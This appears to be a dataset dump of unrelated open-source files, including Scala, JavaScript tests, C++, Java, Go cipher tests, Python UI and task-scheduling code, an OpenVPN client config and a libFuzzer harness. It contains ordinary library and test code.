* @constructor Create a new tuple with 19 elements. Note that it is more idiomatic to create a Tuple19 via `(t1, t2, t3, t4, t5, t6, t7, t8, t9, t10, t11, t12, t13, t14, t15, t16, t17, t18, t19)`
* @param _1 Element 1 of this Tuple19
* @param _2 Element 2 of this Tuple19
* @param _3 Element 3 of this Tuple19
* @param _4 Element 4 of this Tuple19
* @param _5 Element 5 of this Tuple19
* @param _6 Element 6 of this Tuple19
* @param _7 Element 7 of this Tuple19
* @param _8 Element 8 of this Tuple19
* @param _9 Element 9 of this Tuple19
* @param _10 Element 10 of this Tuple19
* @param _11 Element 11 of this Tuple19
* @param _12 Element 12 of this Tuple19
* @param _13 Element 13 of this Tuple19
* @param _14 Element 14 of this Tuple19
* @param _15 Element 15 of this Tuple19
* @param _16 Element 16 of this Tuple19
* @param _17 Element 17 of this Tuple19
* @param _18 Element 18 of this Tuple19
* @param _19 Element 19 of this Tuple19
*/
case class Tuple19[+T1, +T2, +T3, +T4, +T5, +T6, +T7, +T8, +T9, +T10, +T11, +T12, +T13, +T14, +T15, +T16, +T17, +T18, +T19](_1: T1, _2: T2, _3: T3, _4: T4, _5: T5, _6: T6, _7: T7, _8: T8, _9: T9, _10: T10, _11: T11, _12: T12, _13: T13, _14: T14, _15: T15, _16: T16, _17: T17, _18: T18, _19: T19)
extends Product19[T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15, T16, T17, T18, T19]
{
override def toString() = "(" + _1 + "," + _2 + "," + _3 + "," + _4 + "," + _5 + "," + _6 + "," + _7 + "," + _8 + "," + _9 +
"," + _10 + "," + _11 + "," + _12 + "," + _13 + "," + _14 + "," + _15 + "," + _16 + "," + _17 + "," + _18 + "," + _19 + ")"
}
|
{
"pile_set_name": "Github"
}
| null | null |
/**
* Update: 15-5-11
* Editor: qihongye
*/
var fs = require('fs');
var path = require('path');
var fis = require('../lib/fis.js');
var _ = fis.file;
var defaultSettings = (require('../lib/config.js')).DEFALUT_SETTINGS;
var expect = require('chai').expect;
var u = fis.util;
var config = null;
describe('config: config',function(){
beforeEach(function(){
fis.project.setProjectRoot(__dirname);
fis.config.init(defaultSettings);
process.env.NODE_ENV = 'dev';
});
it('set / get', function () {
fis.set('namespace', 'common');
expect(fis.get('namespace')).to.equal('common');
fis.set('obj', {a:'a'});
fis.set('obj.b', 'b');
expect(fis.get('obj')).to.deep.equal({a:'a', b:'b'});
expect(fis.get('obj.c', {c: 'c'})).to.deep.equal({c:'c'});
expect(fis.get('obj.a')).to.equal('a');
expect(fis.get('obj.b')).to.equal('b');
});
it('media', function () {
fis.set('a', 'a');
fis.set('b', 'b');
fis.media('prod').set('a', 'aa');
expect(fis.get('a')).to.equal('a');
expect(fis.media('prod').get('a')).to.equal('aa');
expect(fis.media('prod').get('b')).to.equal('b');
expect(fis.media('prod').get('project.charset')).to.equal('utf8');
});
it('fis.match',function(){
fis.match('**', {
release: 'static/$&'
}); // fis.config.match
fis.match('**/js.js', {
domain: 'www.baidu.com',
useHash: false
}, 1);
path = __dirname+'/file/ext/modular/js.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('www.baidu.com/static/file/ext/modular/js.js?__inline');
//without domain
// useDomain has already been removed, so this should no longer be affected by it
fis.match('**/js.js', {
useDomain: false
}, 2);
path = __dirname+'/file/ext/modular/js.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('www.baidu.com/static/file/ext/modular/js.js?__inline');
fis.match('**/js.js', {
release: null
}, 3);
//without path
path = __dirname+'/file/ext/modular/js.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('www.baidu.com/file/ext/modular/js.js?__inline');
// with ()
fis.match('**/v1.0-(*)/(*).html', {
release: '/$1/$2'
});
path = __dirname+'/file/ext/v1.0-layout/test.html?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('/layout/test.html?__inline');
fis.match('!**/js.js', {
release: '/static/$&',
useHash: true,
domain: 'www.baidu.com'
});
//with !
path = __dirname+'/file/ext/modular/js.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('www.baidu.com/file/ext/modular/js.js?__inline');
// with ! but not match
path = __dirname+'/file/ext/modular/js.less?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('www.baidu.com/static/file/ext/modular/js_'+ f.getHash() +'.less?__inline');
});
it('match ${}', function() {
fis.match('**/*.js', {
release: null,
useHash: false
})
fis.set('coffee', 'js');
fis.match('**/js.js', {
release: '/static/$&'
});
path = __dirname+'/file/ext/modular/js.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('/static/file/ext/modular/js.js?__inline');
path = __dirname+'/file/ext/modular/j.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('/file/ext/modular/j.js?__inline');
});
it('match mixed usage', function() {
fis.set('ROOT', 'js');
fis.match('**', {
useHash: false
});
fis.match('(**/${ROOT}.js)', {
release: '/static/js/$1'
});
fis.match('(**/${ROOT}.less)', {
release: '/static/js/$1'
});
path = __dirname+'/file/ext/modular/js.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('/static/js/file/ext/modular/js.js?__inline');
path = __dirname+'/file/ext/modular/js.less?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('/static/js/file/ext/modular/js.less?__inline');
});
it('del', function(){
fis.config.del();
var origin = fis.config.get();
fis.set('a.b', 'b');
fis.media('pro').set('a.b', 'b');
fis.config.del('a.b');
expect(fis.get('a')).to.deep.equal({});
expect(fis.media('pro').get('a.b')).to.equal('b');
fis.config.del('a');
expect(fis.get()).to.deep.equal(origin);
fis.media('pro').del('a');
expect(fis.media('pro').get()).to.deep.equal({});
});
it('getSortedMatches', function() {
fis.media('prod').match('a', {
name: ''
});
var matches = fis.media('prod')._matches.concat();
var initIndex = matches[matches.length - 1].index;
fis.match('b', {
name: ''
}, 1)
fis.match('c', {
name: ''
}, 2)
fis.media('prod').match('b', {
name: 'prod'
}, 1)
fis.media('prod').match('c', {
name: 'prod'
}, 2);
var result_gl = [
{
raw: 'b',
reg: u.glob('b'),
negate: false,
properties: {name: ''},
media: 'GLOBAL',
weight: 1,
/**
* ValueIterator.cpp
*
* Implementation of the value iterator
*
* @author Emiel Bruijntjes <emiel.bruijntjes@copernica.com>
* @copyright 2014 Copernica BV
*/
#include "includes.h"
/**
* Set up namespace
*/
namespace Php {
/**
* Constructor
* @param impl Implementation iterator
*/
ValueIterator::ValueIterator(ValueIteratorImpl *impl) : _impl(impl) {}
/**
* Copy constructor
* @param that
*/
ValueIterator::ValueIterator(const ValueIterator &that) : _impl(that._impl->clone()) {}
/**
* Destructor
*/
ValueIterator::~ValueIterator() = default;
/**
* Increment position
* @return ValueIterator
*/
ValueIterator &ValueIterator::operator++()
{
// increment implementation
_impl->increment();
// done
return *this;
}
/**
* Decrement position
* @return ValueIterator
*/
ValueIterator &ValueIterator::operator--()
{
// decrement implementation
_impl->decrement();
// done
return *this;
}
/**
* Compare with other iterator
* @param that
* @return bool
*/
bool ValueIterator::operator==(const ValueIterator &that) const
{
return _impl->equals(that._impl.get());
}
/**
* Compare with other iterator
* @param that
* @return bool
*/
bool ValueIterator::operator!=(const ValueIterator &that) const
{
return !_impl->equals(that._impl.get());
}
/**
 * Dereference, this returns a std::pair with the current key and value
* @return std::pair
*/
const std::pair<Value,Value> &ValueIterator::operator*() const
{
return _impl->current();
}
/**
* Dereference, this returns a std::pair with the current key and value
* @return std::pair
*/
const std::pair<Value,Value> *ValueIterator::operator->() const
{
return &_impl->current();
}
/**
* End namespace
*/
}
/*
* reserved comment block
* DO NOT REMOVE OR ALTER!
*/
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.sun.org.apache.bcel.internal.classfile;
import java.io.DataInput;
import java.io.DataOutputStream;
import java.io.IOException;
import com.sun.org.apache.bcel.internal.Const;
/**
* This class is derived from the abstract {@link Constant}
* and represents a reference to a String object.
*
* @version $Id$
* @see Constant
*/
public final class ConstantString extends Constant implements ConstantObject {
private int string_index; // Identical to ConstantClass except for this name
/**
* Initialize from another object.
*/
public ConstantString(final ConstantString c) {
this(c.getStringIndex());
}
/**
* Initialize instance from file data.
*
* @param file Input stream
* @throws IOException
*/
ConstantString(final DataInput file) throws IOException {
this(file.readUnsignedShort());
}
/**
* @param string_index Index of Constant_Utf8 in constant pool
*/
public ConstantString(final int string_index) {
super(Const.CONSTANT_String);
this.string_index = string_index;
}
/**
 * Called by objects that are traversing the nodes of the tree implicitly
* defined by the contents of a Java class. I.e., the hierarchy of methods,
* fields, attributes, etc. spawns a tree of objects.
*
* @param v Visitor object
*/
@Override
public void accept( final Visitor v ) {
v.visitConstantString(this);
}
/**
* Dump constant field reference to file stream in binary format.
*
* @param file Output file stream
* @throws IOException
*/
@Override
public final void dump( final DataOutputStream file ) throws IOException {
file.writeByte(super.getTag());
file.writeShort(string_index);
}
/**
* @return Index in constant pool of the string (ConstantUtf8).
*/
public final int getStringIndex() {
return string_index;
}
/**
* @param string_index the index into the constant of the string value
*/
public final void setStringIndex( final int string_index ) {
this.string_index = string_index;
}
/**
* @return String representation.
*/
@Override
public final String toString() {
return super.toString() + "(string_index = " + string_index + ")";
}
/** @return String object
*/
@Override
public Object getConstantValue( final ConstantPool cp ) {
final Constant c = cp.getConstant(string_index, Const.CONSTANT_Utf8);
return ((ConstantUtf8) c).getBytes();
}
/** @return dereferenced string
*/
public String getBytes( final ConstantPool cp ) {
return (String) getConstantValue(cp);
}
}
client
dev tun
proto tcp
remote sg.mullvad.net 80
cipher AES-256-CBC
resolv-retry infinite
nobind
persist-key
persist-tun
verb 3
remote-cert-tls server
ping 10
ping-restart 60
sndbuf 524288
rcvbuf 524288
auth-user-pass /config/openvpn-credentials.txt
ca /etc/openvpn/mullvad/ca.crt
tun-ipv6
script-security 2
tls-cipher TLS-DHE-RSA-WITH-AES-256-GCM-SHA384:TLS-DHE-RSA-WITH-AES-256-CBC-SHA
// Copyright 2016 Google Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
////////////////////////////////////////////////////////////////////////////////
#include <stddef.h>
#include <stdint.h>
#include "lcms2.h"
// The main sink
int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
if (size == 0)
return 0;
cmsHANDLE handle = cmsIT8LoadFromMem(0, (void *)data, size);
if (handle)
cmsIT8Free(handle);
return 0;
}
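// Build note (illustrative; the flags and file name below are assumptions,
// not part of the original source): this harness is meant to be compiled
// with clang's libFuzzer instrumentation and linked against Little-CMS, e.g.
//
//   clang -fsanitize=fuzzer,address it8_fuzzer.c -llcms2
//
// libFuzzer then calls LLVMFuzzerTestOneInput repeatedly with mutated inputs,
// exercising the cmsIT8LoadFromMem parser above.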
"""
Components for "My playlists" page.
"""
import urwid
from clay.gp import gp
from clay.songlist import SongListBox
from clay.notifications import notification_area
from clay.pages.page import AbstractPage
from clay.hotkeys import hotkey_manager
class MyPlaylistListItem(urwid.Columns):
"""
One playlist in the list of playlists.
"""
signals = ['activate']
def __init__(self, playlist):
self.playlist = playlist
self.text = urwid.SelectableIcon(u' \u2630 {} ({})'.format(
self.playlist.name,
len(self.playlist.tracks)
), cursor_position=3)
self.text.set_layout('left', 'clip', None)
self.content = urwid.AttrWrap(
self.text,
'default',
'selected'
)
super(MyPlaylistListItem, self).__init__([self.content])
def keypress(self, size, key):
"""
Handle keypress.
"""
return hotkey_manager.keypress("playlist_page", self, super(MyPlaylistListItem, self),
size, key)
def start_playlist(self):
"""
Start playing the selected playlist
"""
urwid.emit_signal(self, 'activate', self)
def get_tracks(self):
"""
Returns a list of :class:`clay.gp.Track` instances.
"""
return self.playlist.tracks
class MyPlaylistListBox(urwid.ListBox):
"""
List of playlists.
"""
signals = ['activate']
def __init__(self, app):
self.app = app
self.walker = urwid.SimpleListWalker([
urwid.Text('Not ready')
])
self.notification = None
gp.auth_state_changed += self.auth_state_changed
super(MyPlaylistListBox, self).__init__(self.walker)
def auth_state_changed(self, is_auth):
"""
        Called when auth state changes (e.g. the user is logged in).
Requests fetching of playlists.
"""
if is_auth:
self.walker[:] = [
urwid.Text(u'\n \uf01e Loading playlists...', align='center')
]
gp.get_all_user_playlist_contents_async(callback=self.on_get_playlists)
def on_get_playlists(self, playlists, error):
"""
Called when a list of playlists fetch completes.
Populates list of playlists.
"""
if error:
notification_area.notify('Failed to get playlists: {}'.format(str(error)))
items = []
for playlist in playlists:
myplaylistlistitem = MyPlaylistListItem(playlist)
urwid.connect_signal(
myplaylistlistitem, 'activate', self.item_activated
)
items.append(myplaylistlistitem)
self.walker[:] = items
self.app.redraw()
def item_activated(self, myplaylistlistitem):
"""
Called when a specific playlist is selected.
Re-emits this event.
"""
urwid.emit_signal(self, 'activate', myplaylistlistitem)
class MyPlaylistsPage(urwid.Columns, AbstractPage):
"""
Playlists page.
Contains two parts:
- List of playlists (:class:`.MyPlaylistListBox`)
- List of songs in selected playlist (:class:`clay:songlist:SongListBox`)
"""
@property
def name(self):
return 'Playlists'
@property
def key(self):
return 2
@property
def slug(self):
"""
Return page ID (str).
"""
return "playlists"
def __init__(self, app):
self.app = app
self.myplaylistlist = MyPlaylistListBox(app)
self.songlist = SongListBox(app)
self.songlist.set_placeholder('\n Select a playlist.')
urwid.connect_signal(
self.myplaylistlist, 'activate', self.myplaylistlistitem_activated
)
super(MyPlaylistsPage, self).__init__([
self.myplaylistlist,
self.songlist
])
def myplaylistlistitem_activated(self, myplaylistlistitem):
"""
Called when specific playlist is selected.
Populates songlist with tracks from the selected playlist.
"""
self.songlist.populate(
myplaylistlistitem.get_tracks()
)
def activate(self):
pass
// Copyright 2015 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package tea
import (
"bytes"
"testing"
)
// A sample test key for when we just want to initialize a cipher
var testKey = []byte{0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x99, 0xAA, 0xBB, 0xCC, 0xDD, 0xEE, 0xFF}
// Test that the block size for tea is correct
func TestBlocksize(t *testing.T) {
c, err := NewCipher(testKey)
if err != nil {
t.Fatalf("NewCipher returned error: %s", err)
}
if result := c.BlockSize(); result != BlockSize {
t.Errorf("cipher.BlockSize returned %d, but expected %d", result, BlockSize)
}
}
// Test that invalid key sizes return an error
func TestInvalidKeySize(t *testing.T) {
var key [KeySize + 1]byte
if _, err := NewCipher(key[:]); err == nil {
t.Errorf("invalid key size %d didn't result in an error.", len(key))
}
if _, err := NewCipher(key[:KeySize-1]); err == nil {
t.Errorf("invalid key size %d didn't result in an error.", KeySize-1)
}
}
// Test Vectors
type teaTest struct {
rounds int
key []byte
plaintext []byte
ciphertext []byte
}
var teaTests = []teaTest{
// These were sourced from https://github.com/froydnj/ironclad/blob/master/testing/test-vectors/tea.testvec
{
numRounds,
[]byte{0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
[]byte{0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
[]byte{0x41, 0xea, 0x3a, 0x0a, 0x94, 0xba, 0xa9, 0x40},
},
{
numRounds,
[]byte{0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
[]byte{0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
[]byte{0x31, 0x9b, 0xbe, 0xfb, 0x01, 0x6a, 0xbd, 0xb2},
},
{
16,
[]byte{0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
[]byte{0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
[]byte{0xed, 0x28, 0x5d, 0xa1, 0x45, 0x5b, 0x33, 0xc1},
},
}
// Test encryption
func TestCipherEncrypt(t *testing.T) {
// Test encryption with standard 64 rounds
for i, test := range teaTests {
c, err := NewCipherWithRounds(test.key, test.rounds)
if err != nil {
t.Fatalf("#%d: NewCipher returned error: %s", i, err)
}
var ciphertext [BlockSize]byte
c.Encrypt(ciphertext[:], test.plaintext)
if !bytes.Equal(ciphertext[:], test.ciphertext) {
t.Errorf("#%d: incorrect ciphertext. Got %x, wanted %x", i, ciphertext, test.ciphertext)
}
var plaintext2 [BlockSize]byte
c.Decrypt(plaintext2[:], ciphertext[:])
if !bytes.Equal(plaintext2[:], test.plaintext) {
t.Errorf("#%d: incorrect plaintext. Got %x, wanted %x", i, plaintext2, test.plaintext)
}
}
}
// Copyright (C) 2013 Davis E. King (davis@dlib.net)
// License: Boost Software License See LICENSE.txt for the full license.
#undef DLIB_PARALLEL_FoR_ABSTRACT_Hh_
#ifdef DLIB_PARALLEL_FoR_ABSTRACT_Hh_
#include "thread_pool_extension_abstract.h"
#include "async_abstract.h"
namespace dlib
{
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked (
thread_pool& tp,
long begin,
long end,
T& obj,
void (T::*funct)(long, long),
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This is a convenience function for submitting a block of jobs to a thread_pool.
In particular, given the half open range [begin, end), this function will
split the range into approximately tp.num_threads_in_pool()*chunks_per_thread
blocks, which it will then submit to the thread_pool. The given thread_pool
will then call (obj.*funct)() on each of the subranges.
- To be precise, suppose we have broken the range [begin, end) into the
following subranges:
- [begin[0], end[0])
- [begin[1], end[1])
- [begin[2], end[2])
...
- [begin[n], end[n])
Then parallel_for_blocked() submits each of these subranges to tp for
processing such that (obj.*funct)(begin[i], end[i]) is invoked for all valid
values of i. Moreover, the subranges are non-overlapping and completely
cover the total range of [begin, end).
- This function will not perform any memory allocations or create any system
resources such as mutex objects.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked (
unsigned long num_threads,
long begin,
long end,
T& obj,
void (T::*funct)(long, long),
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following block of code:
thread_pool tp(num_threads);
parallel_for_blocked(tp, begin, end, obj, funct, chunks_per_thread);
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked (
thread_pool& tp,
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- chunks_per_thread > 0
- begin <= end
ensures
- This is a convenience function for submitting a block of jobs to a
thread_pool. In particular, given the range [begin, end), this function will
split the range into approximately tp.num_threads_in_pool()*chunks_per_thread
blocks, which it will then submit to the thread_pool. The given thread_pool
will then call funct() on each of the subranges.
- To be precise, suppose we have broken the range [begin, end) into the
following subranges:
- [begin[0], end[0])
- [begin[1], end[1])
- [begin[2], end[2])
...
- [begin[n], end[n])
Then parallel_for_blocked() submits each of these subranges to tp for
processing such that funct(begin[i], end[i]) is invoked for all valid values
of i.
- This function will not perform any memory allocations or create any system
resources such as mutex objects.
!*/
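// Example usage of the functor overload above (an illustrative sketch, not
// part of the original header; assumes <vector> is included and a
// thread_pool has been constructed):
//
//   std::vector<float> data(1000);
//   thread_pool tp(4);
//   parallel_for_blocked(tp, 0, (long)data.size(),
//       [&](long begin, long end)
//       {
//           // each call processes the contiguous subrange [begin, end)
//           for (long i = begin; i < end; ++i)
//               data[i] = i * 2.0f;
//       });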
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked (
unsigned long num_threads,
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following block of code:
thread_pool tp(num_threads);
parallel_for_blocked(tp, begin, end, funct, chunks_per_thread);
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked (
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following block of code:
parallel_for_blocked(default_thread_pool(), begin, end, funct, chunks_per_thread);
!*/
// ----------------------------------------------------------------------------------------
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for (
thread_pool& tp,
long begin,
long end,
T& obj,
void (T::*funct)(long),
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following function call:
parallel_for_blocked(tp, begin, end, [&](long begin_sub, long end_sub)
{
for (long i = begin_sub; i < end_sub; ++i)
(obj.*funct)(i);
}, chunks_per_thread);
- Therefore, this routine invokes (obj.*funct)(i) for all i in the range
[begin, end). However, it does so using tp.num_threads_in_pool() parallel
threads.
- This function will not perform any memory allocations or create any system
resources such as mutex objects.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for (
unsigned long num_threads,
long begin,
long end,
T& obj,
void (T::*funct)(long),
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following block of code:
thread_pool tp(num_threads);
parallel_for(tp, begin, end, obj, funct, chunks_per_thread);
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for (
thread_pool& tp,
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following function call:
parallel_for_blocked(tp, begin, end, [&](long begin_sub, long end_sub)
{
for (long i = begin_sub; i < end_sub; ++i)
funct(i);
}, chunks_per_thread);
- Therefore, this routine invokes funct(i) for all i in the range [begin, end).
However, it does so using tp.num_threads_in_pool() parallel threads.
- This function will not perform any memory allocations or create any system
resources such as mutex objects.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for (
unsigned long num_threads,
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following block of code:
thread_pool tp(num_threads);
parallel_for(tp, begin, end, funct, chunks_per_thread);
!*/
// ----------------------------------------------------------------------------------------
}
#endif // DLIB_PARALLEL_FoR_ABSTRACT_Hh_
|
{
"pile_set_name": "Github"
}
| null | null |
import asyncio
import random
from typing import Optional, Callable
import aiojobs
import bili_statistics
from user.user import User
from tasks.base_class import TaskType, UniqueType, How2Call
from printer import info as print
class Users:
__slots__ = ('_users', '_global_task_control', '_global_task_arrangement', '_dict_bili', '_force_sleep')
def __init__(self,
global_task_control: dict, global_task_arrangement: dict,
dict_bili: dict, force_sleep: Callable):
self._users = []
self._global_task_control = global_task_control
self._global_task_arrangement = global_task_arrangement
self._dict_bili = dict_bili
self._force_sleep = force_sleep
@property
def superuser(self) -> User:
return self._users[0]
def gets_with_restrict(self, index: int, task):
task_name = task.TASK_NAME
for user in self.gets(index):
if user.is_in_jail and task_name in (
'recv_heart_gift',
'open_silver_box',
'join_storm_raffle',
'join_guard_raffle',
'join_tv_raffle',
'join_pk_raffle'
):
continue
if task_name != 'null':  # 'null' skips filtering and always participates
if f'probability_{task_name}' in user.task_arrangement:  # uniform-probability filter
if not random.random() < user.task_arrangement[f'probability_{task_name}']:
continue
if not bili_statistics.add2max_time_task_checkers(  # daily max-count filter
user_id=user.id,
task=task,
max_time=user.task_arrangement.get(task_name, -1)):
continue
yield user
# async is only needed for the aiohttp session inside User; even if control switched it would be fine, since append does not yield to other coroutines and will not affect a running notifier
async def add_user(self, user_info: dict, custom_task_control: dict, custom_task_arrangement: dict):
task_control = {**self._global_task_control, **custom_task_control}
task_arrangement = {**self._global_task_arrangement, **custom_task_arrangement}
user = User(
dict_user=user_info,
task_ctrl=task_control,
task_arrangement=task_arrangement,
dict_bili=self._dict_bili,
force_sleep=self._force_sleep)
self._users.append(user)
def gets(self, index: int):
if index == -2:
for user in self._users:
yield user
return
user = self._users[index]
yield user
class Notifier:
__slots__ = ('_loop', '_users', '_scheduler',)
def __init__(self, loop=None):
if loop is None:
self._loop = asyncio.get_event_loop()
else:
self._loop = loop
self._users: Optional[Users] = None
self._scheduler: Optional[aiojobs.Scheduler] = None
def init(self, users: Users):
self._users = users
async def add_user(self, **kwargs):
await self._users.add_user(**kwargs)
# pause and resume must be used within the same event loop, otherwise thread-safety-like problems may occur
async def resume(self):
if self._scheduler is None:
self._scheduler = await aiojobs.create_scheduler()
async def pause(self):
if self._scheduler is not None and not self._scheduler.closed:
scheduler = self._scheduler
self._scheduler = None
await scheduler.close()
@staticmethod
async def _unique_work(user: User, task, func: Callable, *args, **kwargs):
if bili_statistics.start_unique_task(user.id, task):
try:
result = await func(user, *args, **kwargs)
bili_statistics.done_unique_task(user.id, task)
return result
except asyncio.CancelledError:
print(f'CONFIRMED CANCEL {user} {func}')
bili_statistics.cancel_unique_task(user.id, task)
else:
print(f'Duplicate push {func} {user.id} (debug info, safe to ignore)')
return None
@staticmethod
async def _multi_work(user: User, _, func: Callable, *args, **kwargs):
try:
return await func(user, *args, **kwargs)
except asyncio.CancelledError:
print(f'CONFIRMED CANCEL {user} {func}')
return None
async def run_sched_func(self, func: Callable, *args, **kwargs):
scheduler = self._scheduler
if scheduler is not None and not scheduler.closed:
await scheduler.spawn(func(*args, **kwargs))
# this exists to handle the check step of daily tasks
async def run_sched_func_with_return(self, func: Callable, *args, **kwargs):
scheduler = self._scheduler
if scheduler is not None and not scheduler.closed:
return await func(*args, **kwargs)
def run_sched_func_bg(self, *args, **kwargs):
self._loop.create_task(self.run_sched_func(*args, **kwargs))
@staticmethod
async def run_forced_func(func: Callable, *args, **kwargs):
return await func(*args, **kwargs)
def run_forced_func_bg(self, *args, **kwargs):
self._loop.create_task(self.run_forced_func(*args, **kwargs))
async def _dont_wait(self, task,
handle_work: Callable,
handle_unique: Callable,
func_work: Callable,
check_results,
_):
for user_id, delay_range, *args in check_results:
for user in self._users.gets_with_restrict(user_id, task):
delay = random.uniform(*delay_range)
self._loop.call_later(
delay, handle_work, handle_unique, user, task, func_work, *args)
async def _wait(self, task,
handle_work: Callable,
handle_unique: Callable,
func_work: Callable,
check_results,
return_results: bool):
if not return_results:
for user_id, _, *args in check_results:
for user in self._users.gets_with_restrict(user_id, task):
await handle_work(handle_unique, user, task, func_work, *args)
return None
results = []
for user_id, _, *args in check_results:
for user in self._users.gets_with_restrict(user_id, task):
results.append(await handle_work(handle_unique, user, task, func_work, *args))
return results
async def _wait_and_pass(self, task,
handle_work: Callable,
handle_unique: Callable,
func_work: Callable,
check_results,
return_results: bool):
if not return_results:
for user_id, _, *args in check_results:
result =
/* Firefox Quantum userChrome.css tweaks ************************************************/
/* Github: https://github.com/aris-t2/customcssforfx ************************************/
/****************************************************************************************/
@import "./addonlists_compact.css";
#addons-page .addon {
padding: 0 4px !important;
}
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.beam.sdk.options;
import com.google.auto.service.AutoService;
import org.apache.beam.sdk.annotations.Experimental;
import org.apache.beam.sdk.annotations.Experimental.Kind;
import org.apache.beam.vendor.guava.v26_0_jre.com.google.common.collect.ImmutableList;
/** Options that are used to control configuration of the remote environment. */
@Experimental(Kind.PORTABILITY)
@Hidden
public interface RemoteEnvironmentOptions extends PipelineOptions {
  // The default should be null (no default), so that the environment can pick a suitable tmp
// directory when nothing is specified by the user
@Description("Local semi-persistent directory")
String getSemiPersistDir();
void setSemiPersistDir(String value);
/** Register the {@link RemoteEnvironmentOptions}. */
@AutoService(PipelineOptionsRegistrar.class)
class Options implements PipelineOptionsRegistrar {
@Override
public Iterable<Class<? extends PipelineOptions>> getPipelineOptions() {
return ImmutableList.of(RemoteEnvironmentOptions.class);
}
}
}
Alternative delimiters for [link definitions][link1] are allowed -- as of
Markdown 1.0.2, I think. Hence, [this link][link2] and [this link][link3] work
too.
[link1]: http://daringfireball.net/projects/markdown/syntax#link "link syntax"
[link2]: http://daringfireball.net/projects/markdown/syntax#link 'link syntax'
[link3]: http://daringfireball.net/projects/markdown/syntax#link (link syntax)
/****************************************************************************
* Driver for Solarflare network controllers and boards
* Copyright 2005-2006 Fen Systems Ltd.
* Copyright 2005-2013 Solarflare Communications Inc.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 as published
* by the Free Software Foundation, incorporated herein by reference.
*/
#include <linux/socket.h>
#include <linux/in.h>
#include <linux/slab.h>
#include <linux/ip.h>
#include <linux/ipv6.h>
#include <linux/tcp.h>
